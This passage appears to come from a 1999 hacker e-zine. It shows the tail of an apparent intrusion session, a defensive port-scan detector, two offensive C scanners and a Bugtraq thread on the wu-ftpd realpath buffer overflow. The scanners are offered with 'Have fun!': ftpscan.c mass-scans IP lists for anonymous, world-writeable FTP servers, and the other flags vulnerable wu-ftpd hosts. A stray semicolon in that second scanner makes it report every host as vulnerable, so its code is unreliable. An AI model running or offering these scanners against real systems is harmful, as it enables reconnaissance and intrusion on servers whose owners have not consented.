1:41.84 /usr/local/etc/ root 1966 0.0 1.2 1004 732 ?? IN Fri10AM 0:01.79 /usr/local/etc/ root 12504 0.0 0.8 780 516 v1 Is+ 11:45PM 0:00.14 /usr/libexec/ge nobody 13143 0.0 1.9 1456 1188 ?? I 9:43AM 0:00.97 httpd nobody 13153 0.0 1.9 1456 1204 ?? I 9:55AM 0:00.82 httpd nobody 13228 0.0 1.9 1468 1212 ?? I 11:38AM 0:00.66 httpd nobody 13529 0.0 1.9 1456 1204 ?? I 4:57PM 0:00.23 httpd root 13576 0.0 1.3 1072 784 ?? I 5:54PM 0:00.02 /usr/local/etc/ root 13645 0.0 1.3 1072 832 ?? I 7:25PM 0:00.02 /usr/local/etc/ root 0 0.0 0.0 0 0 ?? DLs Thu09AM 0:04.13 (swapper) root 1 0.0 0.4 416 248 ?? Is Thu09AM 0:02.43 /sbin/init -- root 2 0.0 0.0 0 0 ?? DL Thu09AM 0:09.21 (pagedaemon) % ls -laF /ftp total 6 drwxr-xr-x 6 root wheel 512 Mar 11 14:15 ./ drwxr-xr-x 14 root wheel 1024 Jan 26 12:28 ../ drwxr-xr-x 2 root wheel 512 Mar 1 15:57 pub/ drwxr-xr-x 3 root wheel 512 Mar 12 12:04 pvt/ drwxrwxrwx 35 root wheel 1024 Mar 31 06:54 secure/ drwxrwxrwx 2 root wheel 512 Mar 11 14:15 warez/ % cd /www % logout Connection closed by foreign host. $ By the way. a site that is good to look around with lots of legit info is www.nic.mil and ftp.nic.mil .... network topology to phone numbers for NIPR/SIPRENET can be found on that system. Anyway the point of all this is that on this navy site its a good idea to {ahem} go FISH yeah thats right, http://infosec.nosc.mil/FISH/ has a lot of good information btw fish stands for Fleet Internet Security Handbook. Cute huh? heh. go FISH @HWA 24.0 Portscan detector ~~~~~~~~~~~~~~~~~ /* * Scandetd is daemon which tries to recognize port scanning. * If it happens daemon sends e-mail to specified address (by default * root@localhost) * with following informations: * * time * host * how many connetctions was made * port of first connection and port of last connection * * compile: gcc scandetd.c -o scandetd * * author: Michal Suszycki mike@wizard.ae.krakow.pl * * You can change few define's and variables below this comment to tune * scandetd to your needs. * * If you have some problems with compiling try to * change 2 lines: * #include to #include * #include to #include * * This code was based on IpLogger Package by Mike Edulla (medulla@infosoc.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 1, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include #include #include #include #include #include #include #include #include #include #include //#include #include //#include #include #include #include #include extern int errno; /* how many hosts should I remember. If your server is heavily loaded it's good idea to increase this number a little bit */ #define HOW_MANY 6 /* how many connections should I recognize as scanning? */ #define SCAN 25 /* uncomment this if you want to ignore 'scanning' which starts and ends on 80 port. It happens that some host makes a lot of fast connections only on port 80. Of course we don't want to log it. */ #define NOWWW /* If next connection arrived right after the previous one we have to count it. Default time is 1 second. */ #define SEC 1 /* We use this port for sending mail */ #define MAIL_PORT 25 /* we send mail to : */ char *mail_to = ""; /* IP of the machine which sends our mail */ char *mail_host = ""; /* mail will be send from host: */ char *from_host = "localhost"; /* ----------- end of user's configuration ---------------- */ #ifndef NOFILE #define NOFILE 1024 #endif char *hostlookup(int i) { static char buff[128]; struct in_addr p; p.s_addr = i; strncpy(buff,inet_ntoa(p),sizeof buff); return buff; } char *servlookup(unsigned short port) { struct servent *se; static char buff[1024]; se=getservbyport(port, "tcp"); if(se == NULL) sprintf(buff, "port %d", ntohs(port)); else sprintf(buff, "%s", se->s_name); return buff; } struct ippkt{ struct iphdr ip; struct tcphdr tcp; } pkt; struct host{ unsigned int from; time_t t; unsigned short low_port; unsigned short hi_port; int count; } hosts[HOW_MANY]; void demonize() { int fd, f; if (getppid() != 1){ signal(SIGTTOU,SIG_IGN); signal(SIGTTIN,SIG_IGN); signal(SIGTSTP,SIG_IGN); f = fork(); if (f < 0) exit(-1); if (f > 0) exit (0); /* child process */ setpgrp(); for (fd = 0 ; fd < NOFILE; fd++) close(fd); chdir("/"); umask(0); return; } } void init() { int i; time_t now; now = time(NULL); for (i = 0; i < HOW_MANY; i++) hosts[i].t = now; } int allocate(int *p, unsigned int addr) { int i, v = 0; time_t tmp = hosts[0].t; for( i = 0; i < HOW_MANY; i++){ if (hosts[i].t <= tmp) { tmp = hosts[i].t; v = i; } if (hosts[i].from == addr){ *p = 1; return i; } } *p = 0; return v; } void show(int a) { int i; for (i = 0; i < HOW_MANY; i++){ printf("Host %s, time %ld, count=%d, l=%d,", hostlookup(hosts[i].from),hosts[i].t, hosts[i].count, ntohs(hosts[i].low_port)); printf("hi = %d\n",ntohs(hosts[i].hi_port)); } exit (0); } void no_zombie(int i) { wait(NULL); } int send_mail(struct host *bad) { static struct sockaddr_in sa; int s, i, low, high; char buf[1024], combuf[256]; char *comm[] = { "HELO ", from_host, "MAIL FROM: SCANDETD@", from_host, "RCPT TO:" , mail_to, "DATA" , " " }; i = fork(); if (!i) return 0; if (i < 0) return -1; low = ntohs(bad->low_port); high = ntohs(bad->hi_port); sprintf(buf,"%sPossible port scanning from %s,\n" "I counted %d connections.\nFirst connection was made on %d port and the last one on %d port.\r\n.\r\n", ctime(&bad->t),hostlookup(bad->from),bad->count, low, high); sa.sin_port = htons(MAIL_PORT); sa.sin_family = AF_INET; if ((sa.sin_addr.s_addr = inet_addr(mail_host)) == -1) exit (-1); bzero(&sa.sin_zero, 8); if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit (-1); if (connect(s,(struct sockaddr *) &sa, sizeof (struct sockaddr)) < 0) exit (-1); for (i = 0; i < 8 ; i += 2){ sprintf(combuf,"%s%s\n",comm[i],comm[i+1]); if (write(s,combuf,strlen(combuf)) < 0 ){ close(s); exit(-1); } sleep(1); } if (write(s,buf,strlen(buf)) < 0) exit(-1); sleep(1); if (write(s,"QUIT\n",5) < 0) exit (-1); close(s); exit(0); } void main(int argc, char **argv) { int s, index, was; time_t now; demonize(); init(); s = socket(AF_INET, SOCK_RAW, 6); // openlog("scand", 0, LOG_LOCAL2); // syslog(LOG_NOTICE,"scand started and ready"); // signal(SIGINT,show); /* to avoid zombies */ signal(SIGCHLD,no_zombie); while(1){ read(s, (struct ippkt*) &pkt, sizeof(pkt)); now = time(NULL); if (pkt.tcp.syn == 1 && pkt.tcp.ack == 0){ index = allocate(&was,pkt.ip.saddr); if (!was){ if (hosts[index].count >= SCAN #ifdef NOWWW && hosts[index].low_port != 20480 && hosts[index].hi_port != 20480 #endif ) send_mail(&hosts[index]); hosts[index].from = pkt.ip.saddr; hosts[index].low_port = pkt.tcp.dest; hosts[index].hi_port = pkt.tcp.dest; hosts[index].count = 1; hosts[index].t = now; continue; } /* if this connection was right after previous we must count it */ else if (now - SEC <= hosts[index].t){ hosts[index].count++; hosts[index].hi_port = pkt.tcp.dest; } hosts[index].t = now; } } } @HWA 25.0 FTP Vulnerability scanner ~~~~~~~~~~~~~~~~~~~~~~~~~ Here is a ftp vulnerability scanner: -----[ cut here, ftpscan.c ]----- /* * ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999 * * This will open a specific file [-f file], get the IPs from it, * then, check if FTP port [ -p 21 ] is open and log the version. * If you specify the [ -o ] flag it will try log into the FTP * and execute LIST command [recursive], this is usefull * for see if there are any world writeable directories. * * You should know what you can do with that. * * credits: localip (lip) routine has been taken from queSO. * * Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo * #rdC - ub * */ #include #include #include #include #include #include #include #include #include #include #include #include "blah.h" /* taken from queSO */ char rdcopenfile(char g0d[257]); void usage(char *damn); void RDCconnect2(char host[1000], int puerto); int bindit(int socket_type, u_short port, int *listener); void sigh(int z); u_long lip(void); /* QueSO */ FILE *file; FILE *fileout; char ipsfile[256], bleh[100000][200], homer[256], beer[256], huhense[32]; u_long localip; int sockfd, leen2=0, listing=0, sockfd1, ip1=0, ip2=0, ip3=0, ip4=0, lsock=-1, port2=-1, lala=0, dfinder=0, gotit=0, xx=0; int main(int argc, char **argv) { char arg; int p0rt=21; if ( argc < 3 ) { usage(argv[0]); } while ((arg = getopt(argc, argv, "f:p:o")) != EOF) { switch(arg) { case 'f': strncpy(ipsfile,optarg,128); break; case 'p': p0rt = atoi (optarg); break; case 'o': listing = 1; break; default: usage(argv[0]); break; } } while (dfinder < 5) { char disp[500]; sprintf(disp,"ppp%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } dfinder=0; if (gotit == 1) dfinder=6; while (dfinder < 5) { char disp[500]; sprintf(disp,"eth%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } if (gotit == 0) { fprintf(stdout,"\nCannot define local ip address, aborting!\n\n"); fflush(stdout); exit(1); } fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip)); fflush(stdout); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala); strlen(beer); rdcopenfile(ipsfile); for (xx = 0 ; xx < leen2 ; xx++) { RDCconnect2(bleh[xx], p0rt); lala++; } } char rdcopenfile(char g0d[257]) { int x; /* see if the file can be read... */ if ((file=fopen(g0d,"r")) == NULL) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nCannot open file %s for reading\n\n", g0d); exit(1); } /* get the all the lines */ for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++); fclose(file); } void RDCconnect2(char host[1000], int puerto) { char versi0n[5000]; int nmb; struct sockaddr_in beb; struct hostent *d0h; // struct timeval timev; beb.sin_family = AF_INET; beb.sin_port = htons(puerto); d0h = gethostbyname(host); if (!d0h) { if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nPut a correct address\n\n"); exit(0); } } else { bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length); } strcpy(homer,"unable to connect: Connection refused"); sockfd = socket(AF_INET, SOCK_STREAM,0); fprintf(stdout,"\n------------------------------------------------------------------------------n"); fprintf(stdout,"IP: %s", host); fflush(stdout); signal(SIGALRM, sigh); alarm(10); if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0) { fprintf(stdout,"%s\n\n",homer); fflush(stdout); return; } alarm(0); bzero(versi0n, sizeof(versi0n)); if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1) { fprintf(stdout,"Connection reset by peer?\n\n"); fflush(stdout); } if (strlen(versi0n) == 0) { close(sockfd); return; } if (strstr(versi0n,"Microsoft") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"WinSock") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"NetWare") != NULL) { fprintf(stdout,"Skipping host cuz its runing NetWare\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"Proxy Server") != NULL) { fprintf(stdout,"Runing ProxyServer, skipping host\n\n"); fflush(stdout); close(sockfd); return; } fprintf(stdout,"FTP banner:\n"); fprintf(stdout,"%s\n",versi0n); fflush(stdout); if (listing == 1) { char username[70], sendear[17200], listit[100]; int n; /* login in */ strcpy(username,"anonymous"); sprintf(sendear,"USER %s\n",username); fprintf(stdout,"Login as: %s\n",username); write(sockfd,sendear,strlen(sendear)); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"denied") != NULL) { fprintf(stdout,"Anonymous access denied, skipping\n\n"); close(sockfd); return; } if (strstr(sendear,"USER anonymous") != NULL) { fprintf(stdout,"Remote host has closed the connection.\n\n"); close(sockfd); return; } if (strstr(sendear,"unknown") != NULL) { fprintf(stdout,"Anonymous access unknown\n\n"); close(sockfd); return; } if (strstr(sendear,"not found") != NULL) { fprintf(stdout,"User anonymous not found\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Using password: bleh@\n"); write(sockfd,"PASS bleh@\n",11); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"Can't set") != NULL) { fprintf(stdout,"Cant set guest privileges\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Setting PORT to %d\n",17886+lala); bzero(beer,sizeof(beer)); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala); write(sockfd,beer,strlen(beer) + 4); read(sockfd,beer,sizeof(beer)); /* bind the port for data transfer */ sockfd1 = bindit(SOCK_STREAM, port2, &lsock); read(sockfd,sendear,sizeof(sendear)); fprintf(stdout,"Using LIST command\n"); fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); read(sockfd1,sendear,sizeof(sendear)); fprintf(stdout,"Recursive list:\n %s\n",sendear); bzero(sendear, sizeof(sendear)); fflush(stdout); // lala++; } close(sockfd); close(sockfd1); } int bindit(int socket_type, u_short port, int *listener) { struct sockaddr_in address; int listening_socket; int connected_socket = -1; int reuse_addr = 1; char sendear[17200]; port = htons(17886+lala); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = port; address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, socket_type, 0); if (listening_socket < 0) { fprintf(stdout,"Cant recive list.\n\n"); fflush(stdout); return; } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr)); if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) { fprintf(stdout,"Error\n\n"); fflush(stdout); close(listening_socket); exit(1); } listen(listening_socket, 1); signal(SIGALRM, sigh); alarm(10); while(connected_socket < 0) { connected_socket = accept(listening_socket, NULL, NULL); } } void sigh(int z) { alarm(0); signal(SIGALRM, SIG_DFL); strcpy(homer,"Unable to connect: timeout"); } u_long lip (void) { int pvto, yesto, traversal; struct sockaddr_in *dim0n; struct ifreq *i; struct ifconf ic; char bufercito[512]; pvto = socket (AF_INET, SOCK_STREAM, 0); ic.ifc_pum = 512; ic.ifc_buf = bufercito; ioctl (pvto, SIOCGIFCONF, (char *) &ic); i = ic.ifc_req; yesto = (ic.ifc_pum / sizeof(struct ifreq)); for (traversal = 0; traversal < yesto; traversal++) { ioctl(pvto, SIOCGIFADDR, (char *) &i); dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr; if (!strcmp (i->ifr_name, huhense)) return dim0n->sin_addr.s_addr; i++; } } void usage(char *damn) { printf("\n<[( ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>"); printf("<[( usage:\n"); printf("<[( %s -f file [-p port] [-o]\n\n",damn); printf("<[( -f file: file is the IPs file.\n"); printf("<[( -p port: port to connect to, default 21.\n"); printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n"); printf("<[( as anonymous, and do a recursive list.\n\n"); exit(0); } -----[ end of ftpscan.c ]----- -----[ cut here, blah.h ]----- #include #include #include #include #include #include #include #include #include #define NOMBRESIZE 16 struct ifmap { unsigned long mem_start; unsigned long mem_end; unsigned short base_addr; unsigned char irq; unsigned char dma; unsigned char port; /* 3 bytes spare */ }; struct ifreq { union { char ifrn_name[NOMBRESIZE]; /* if name, e.g. "en0" */ } ifr_ifrn; union { struct sockaddr ifru_addr; struct sockaddr ifru_dstaddr; struct sockaddr ifru_broadaddr; struct sockaddr ifru_netmask; struct sockaddr ifru_hwaddr; short ifru_flags; int ifru_metric; int ifru_mtu; struct ifmap ifru_map; char ifru_slave[NOMBRESIZE]; /* Just fits the size */ caddr_t ifru_data; } ifr_ifru; }; #define ifr_name ifr_ifrn.ifrn_name /* interface name */ #define ifr_hwaddr ifr_ifru.ifru_hwaddr /* MAC address */ #define ifr_addr ifr_ifru.ifru_addr /* address */ #define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-p lnk */ #define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */ #define ifr_netmask ifr_ifru.ifru_netmask /* interface net mask */ #define ifr_flags ifr_ifru.ifru_flags /* flags */ #define ifr_metric ifr_ifru.ifru_metric /* metric */ #define ifr_mtu ifr_ifru.ifru_mtu /* mtu */ #define ifr_map ifr_ifru.ifru_map /* device map */ #define ifr_slave ifr_ifru.ifru_slave /* slave device */ #define ifr_data ifr_ifru.ifru_data /* for use by interface */ struct ifconf { int ifc_pum; /* size of buffer */ union { caddr_t ifcu_buf; struct ifreq *ifcu_req; } ifc_ifcu; }; #define ifc_buf ifc_ifcu.ifcu_buf /* buffer address */ #define ifc_req ifc_ifcu.ifcu_req /* array of structures */ -----[ end of blah.h ]----- Have fun! @HWA 26.0 WuFTP scanner ~~~~~~~~~~~~~ /* This is probably more script-kiddie-ish than the last wu-ftpd scanner, but with almost no modifications you can make Lord Somer's IMAPVuln into a scanner that will look for anything, probably no point in putting it on the page, I'm sure someone will code one from scratch. - SellOut */ /* IMAPVuln Scanner By: Lord Somer Scans the ips in a file to see if they run a vulnerable version of imap then output to a file Checks if ver is 9.0, 10.166, 10.171, 10.183, 10.190, 10.205, 10.223, 10.233 Thanks to guy who made statd scanner, warchld for some of the other vulnerable version #'s. */ #include #include #include #include #include #include #include #include #include #include #include /* connect_timeo taken from mscan by jsbach */ #define TIMEOUT 5 #include #include #ifdef LINUX #include #endif typedef void Sigfunc (int); void connect_alarm(int signo); int connect_timeo(int sockfd, struct sockaddr *saptr, int salen, int nsec) { int n; alarm(0); signal(SIGALRM,connect_alarm); alarm(TIMEOUT); if( (n = connect(sockfd, (struct sockaddr *) saptr, salen)) < 0) { close(sockfd); if(errno == EINTR) errno = ETIMEDOUT; } alarm(0); signal(SIGALRM, SIG_DFL); return(n); } void connect_alarm(int signo) { return; } /* end jsbach's code */ void usage(char *s) { printf("Original Usage"); printf("IMAPVuln Scanner v1.0\n"); printf("Usage: %s \n",s); printf(" By: Lord Somer \n"); printf(" Check out efnet #sploits and\nThe Hackers Layer http://www.lordsomer.com\n"); printf("This is modified to scan for, probably, exploitable wu-ftpds, same syntax.\n"); exit(-1); } unsigned long int res(char *p) { struct hostent *h; unsigned long int rv; h=gethostbyname(p); if(h!=NULL) memcpy(&rv,h->h_addr,h->h_length); else rv=inet_addr(p); return rv; } void imapscan(char *i, char *o) { FILE *iff, *of; char buf[512]; if((iff=fopen(i,"r")) == NULL) return; while(fgets(buf,512,iff) != NULL) { if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0; if(imapvuln(buf) == 1 && (of=fopen(o,"a")) != NULL) { buf[strlen(buf)+1]=0; buf[strlen(buf)]='\n'; fputs(buf,of); fclose(of); } } fclose(iff); } int imapvuln(char *host) { int sockfd; int len; struct sockaddr_in address; int result; char buffer[200]; sockfd = socket(AF_INET, SOCK_STREAM, 0); address.sin_family = AF_INET; address.sin_addr.s_addr = res(host); address.sin_port = htons(21); len = sizeof(address); if (connect_timeo(sockfd, (struct sockaddr *)&address, len, 2) == -1) { /* Host timed out, thus not vulnerable */ close(sockfd); return 0; } result = read(sockfd, buffer, sizeof(buffer)); /* * We look for all versions that we know are vulnerable, i did it this way so it's easy to add * in new versions that an exploit comes out for. */ /* This is the only part I had to change, except for the port. I based what it looks for on the comments by Gregory A Lundberg on BugTraq, we could get very specific here, but for times sake I don't think we need to. - SellOut */ if (strstr(buffer,"Version wu-2.4.2-academ[BETA-1")); { close(sockfd); return 1; } close(sockfd); return 0; } int main(int argc, char **argv) { if (argc < 3) usage(argv[0]); imapscan(argv[1], argv[2]); return 1; } @HWA 27.0 The Wu-FTPd exploit and patch thread ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: owner-wu-ftpd@wugate.wustl.edu [mailto:owner-wu-ftpd@wugate.wustl. edu] On Behalf Of Gregory A Lundberg Sent: Tuesday, March 23, 1999 10:44 AM To: Russ Allbery Cc: ayu1@nycap.rr.com; wu-ftpd@wugate.wustl.edu Subject: Re: FW: ftp exploit > > On 23 Mar 1999, Russ Allbery wrote: > > > any comments? > > It's an exploit script for the path overflow bug that's already been > announced by CERT, been on all the security lists, and has already > been fixed in the latest version of every wu-ftpd variant that I'm > aware of as well as being the impetus for the final mainline wu-ftpd > release? > Correct. This is a full exploit against Redhat 5.2 (the original advisory was based upon a test, not an exploit). > My comment: This posting proves why you need to keep up with the CERT mailing list, if not Bugtraq and other lists. As often heppens, the exploit followed the discovery of the vulnerability by several weeks. While it sometimes happens that exploits are distributed before the daemon authors are notified and public security announcement made, this was not the case here. > > > My testing shows: > This is an exploit using the buffer overflow described in > CERT Advisory CA-99.03 - FTP-Buffer-Overflows > Available from htp://www.CERT.org/ > It is directed solely at Redhat CD 4.2 Linux systems running a clean, default install. It was not successfull on unclean 5.2 systems, the pre-5.2 systems I tested on, or when I built the daemon by-hand instead of using a Redhat (S)RPM. My testing showed, while none of the systems I have available were exploitable, the exploit WOULD HAVE WORKED but failed for identifiable reasons. > Given working code for Redhat 4.2, it should be a fairly simply matter to port to non-Linux or non-5.2 systems. > > > WHO IS VULNERABLE ----------------- > - Systems running ALL versions of WU-FTPD _prior_ to 2.4.2 (final), including all 2.4.2-beta versions, ARE VULNERABLE, except as noted below: > - Systems with proper upload clauses are partially protected. Many systems do not use proper upload clauses for real/guest users and are NOT protected from abuse by their local users. > - Systems with proper permissions are partially protected. Most systems do not use proper permissions for real/guest users since they would prevent use by Telnet/SSH/Shell .. such systems are NOT protected from their local users. > > > WHO IS NOT VULNERABLE --------------------- > - Systems running 2.4.2 (final) are protected against _this_ bug. Such systems should upgrade to VR16 for maximum security; a number of other bugs and security problems have been fixed in VR16. > - Systems running 2.4.2-beta-18-VR10 or later are protected. Anyone running VR10 through VR13 should upgrade to VR14 or later at your earliest convenience. > - Systems running BeroFTPD 1.2.0 or later are NOT vulnerable. All BeroFTPD systems should upgrade to the current version (1.3.4) at their earliest conenience. Anyone running a vulnerable system with NEWVIRT, will want to immedeately upgrade to BeroFTPD. > > > The location of the latest version of wu-ftpd can be found in the directory > ftp://ftp.vr.net/pub/wu-ftpd/ > >wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/ >wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html >wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/ > >-- > >Gregory A Lundberg Senior Partner, VRnet Company >1441 Elmdale Drive lundberg+wuftpd@vr.net >Kettering, OH 45409-1615 USA 1-800-809-2195 ------------------------------------------------------------------------------ Date: Thu, 25 Mar 1999 22:17:33 -0500 From: Gregory A Lundberg To: BUGTRAQ@netspace.org Subject: Re: wu-ftpd overflow. On Sun, 21 Mar 1999, CyberPsychotic wrote: > (cc'ed to bugtraq since I haven't seen yet any patches fixing this > problem were posted there) Yes, the exploit recently posted to Bugtraq takes advantage of the realpath() buffer overflows .. as they exist in the Redhat RPM version shipped on their 5. CD. The exploit may require some modification to be successfully used against other Linux/Intel systems and, of course, will need major changes to be used against other hardware or software platforms. About the exploit posted on Bugtraq: my read-through of the shows it does use the vulnerability through the MKD command. You are correct that some Academ beta versions do not use the source-provided vulnerable realpath() function for MKD. ISTM it should be fairly easy to modify the exploit to make use of other commands where a given Academ beta version _does_ use realpath(). Remember, the exploit is an _example_ of the problem, it does not reveal the true magnetude of the vulnerability. A positive test proves vulnerability while a negative test proves nothing. The vulnerable and non-vulnerable versions were outlined in the advisories which _were_ posted on Bugtraq. The realpath() problem was openly discussed on Bugtraq weeks (months? .. I'd have to look through the Bugtraq archives again) before the release of the advisories. The actively maintained versions of the wu-ftpd daemon were immedeately corrected as a result of the realpath() vulnerability discussions on Bugtraq, so they had been corrected for quite some time prior to Netect's research indicating there may be a problem. At the time of publication of the Netect/CERT Advisories, patches for wu-ftpd were unnecessary since the current, maintained, versions were not vulnerable. My patch file for wu-ftpd, which corrects the problem, is presently 644162 bytes in length, fixes several hundred other problems with the daemon, and is available via FTP from ftp://ftp.vr.net/pub/wu-ftpd/ for those silly enough to want it (I rather doubt it Aleph would allow it through to the Bugtraq the mailing list). I am not inclined to pull out the patches for realpath() because the entire pile of male bovine by-product was replaced. A patch file for the other major, maintained, version of wu-ftpd (BeroFTPD) is not available at all. Since today it would probably run well over 1 Meg, the maintainer sees no point in the fiction of 'patching'. He is also dis-inclined to pull out the realpath() changes since he and I co-operated on the complete replacement of the function (actually he did most of the initial work; I just debugged it). At about the time of the Netect/CERT Advisorie Redhat released updated RPMs for the vulnerable Academ 2.4.2-betas they distribute. I don't know whether they released before or after, but I do recall it was just a few hours before their availability was discussed on Bugtraq. Other versions (from wu-stl and academ) are not actively maintained and should not be used in production environments. Anyone running versions of wu-archive / the wu-ftpd daemon older than Academ's 2.4.2-beta-18 has more severe problems than this buffer overrun, so I see no point posting the patch. For them the correct solution is either updating to a more current version or manual operation of the power switch. The only current version still vulnerable when the CERT advisory was issued the Academ version 2.4.2-beta-18, which is (almost) not actively maintained. A week or two following the CERT advisory Academ silently released 2.4.2 (final). My knowledge of the code, and my direct research indicates: The 2.4.2 (final) version does not completely solve the problem. Nor does your patch. (Nor, for that matter, does the Redhat patch but that's a moot point since their patch does fix the problem for their Linux systems.) For systems using the realpath() function supplied with the source kit, a patch will work to correct, or at least hide, most, if not all, of the vulnerability. For other systems, whether or not the daemon is vulernable depends upon whether or not your vendor-supplied realpath() function is vulnerable (back to the original discussion on Bugtraq). The only change here from my recommendations appearing in the Netect and CERT advisories is that the number of potentially vulnerable systems has been reduced by those using the daemon-supplied realpath() function to only those with vendor-supplied vulnerable realpath() functions. To determine if your daemon uses the supplied function, look in /src/config/config. for a line reading something like: #define realpath realpath_on_steroids If this #define does NOT appear, contact your vendor concerning the vulnerability of the realpath() function, or upgrade to a more-current version of the daemon (yes, there are versions much more current that Academ's 2.4.2/final). Those wishing further information may contact me via the wu-ftpd support mailing list at mailto:wu-ftpd@wugate.wustl.edu .. subscription and unsubscription information for that mailing list are in the FAQ. The location of the latest versions of wu-ftpd can be found in the directory ftp://ftp.vr.net/pub/wu-ftpd/ wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/ wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/ (The html version of the wu-ftpd list archive is currently not working, use the Unix mailbox format instead.) -- Gregory A Lundberg Senior Partner, VRnet Company 1441 Elmdale Drive lundberg+wuftpd@vr.net Kettering, OH 45409-1615 USA 1-800-809-2195 ------------------------------------------------------------------------------ Date: Sun, 21 Mar 1999 18:21:22 +0500 From: CyberPsychotic To: BUGTRAQ@netspace.org Subject: wu-ftpd overflow. ~ Has some1 located the file/function where ~ the overflow takes place ? Yes. I think overflow takes place is function realpath.c: look at the end of the function realpath(), which first concatinates everything together and then just does strcpy into result variable, which is pointer to buffer sized of MAXPATHLEN. You could either owerflow workpath variable in realpath, or, if your buffer is not too fat, it will be overflowed later, when function makedir returns (called from ftpcmd). in either case return address gets overflowed and it returns nowhere (or to your exploit code if you put there such, no big deal). I've made a couple of fixes to ftpd daemon to generate debugging info via syslog, so here's what I have: Mar 21 12:21:46 gear ftpd[21737]: ftpcmd:1294 (ftpcmd called makedir) Mar 21 12:21:46 gear ftpd[21737]: before 3180 (calling realpath line 3128) Mar 21 12:21:46 gear ftpd[21737]: overflow:180 (here overflow takes place) Mar 21 12:21:46 gear ftpd[21737]: overflow:210 (again. It's being copied twice) Mar 21 17:21:47 gear syslogd: Cannot glue message parts together Mar 21 12:21:46 gear ftpd[21737]: after 3180 (realpath line 3128 returns) /foo/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Mar 21 17:21:47 gear 